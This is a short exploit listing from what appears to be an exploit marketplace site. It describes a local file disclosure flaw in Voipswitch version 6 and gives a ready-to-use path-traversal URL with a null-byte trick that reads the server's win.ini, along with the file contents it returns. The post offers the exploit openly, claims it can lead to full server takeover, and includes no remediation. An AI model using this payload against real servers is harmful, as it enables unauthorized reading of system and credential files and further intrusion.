[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Voipswitch 6 Local File Disclosure Vulnerability

Author
0x4148
Risk
[
Security Risk Low
]
0day-ID
0day-ID-22503
Category
web applications
Date add
10-08-2014
Platform
hardware
# Voipswitch <= 6 , LFD Exploit
# Author : 0x4148

Voipswitch’s Unified Communication enables providers to offer a hosted
business communication solution.
Enterprises, instead of maintaining costly on-premises PBXes, can now
enroll to a service in the cloud – Unified Communication as a Service
(UCaaS).

Voipswitch suffer from LFD vuln which can lead to full server take over

Exploit : http://ip:port/user.php?action=../../../windows/win.ini%00.jpg

Result
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

For my masters @ Eg-R1z cr3w : That's it :)

#  0day.today [2024-11-15]  #